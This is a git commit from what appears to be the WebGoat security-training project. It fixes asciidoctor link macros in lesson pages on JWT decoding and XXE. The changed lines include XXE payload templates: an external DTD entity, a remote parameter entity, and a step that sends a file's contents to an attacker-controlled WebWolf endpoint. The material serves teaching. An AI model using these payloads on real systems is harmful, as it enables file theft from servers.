Fix return type of asciidoctor macro implementation.

This commit is contained in:
Nanne Baars
2021-04-23 15:11:56 +02:00
parent 70cda80176
commit a1071e9c00
4 changed files with 24 additions and 17 deletions

View File

@ -1,6 +1,6 @@
== Decoding a JWT token
Let's try decoding a JWT token, for this you can use the webWolfLink:JWT[] functionality inside WebWolf.
Let's try decoding a JWT token, for this you can use the webWolfLink:JWT[target=jwt] functionality inside WebWolf.
Given the following token:
[source]

View File

@ -13,7 +13,7 @@ We can again use WebWolf to host a file called `attack.dtd`, create this file wi
[source, subs="macros, specialcharacters"]
----
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY ping SYSTEM 'webWolfRootLink:landing[noLink]'>
<!ENTITY ping SYSTEM 'webWolfRootLink:landing[noLink, target=landing]'>
----
Now submit the form change the xml using to:
@ -22,7 +22,7 @@ Now submit the form change the xml using to:
----
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "webWolfLink:files/attack.dtd[noLink]">
<!ENTITY % remote SYSTEM "webWolfLink:[webWolfLink]">
%remote;
]>
<comment>

View File

@ -11,6 +11,6 @@ In the previous page we showed you how you can ping a server with a XXE attack,
|===
Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink]`
Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink,target=landing]`
(NOTE: this endpoint is under your full control)
Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.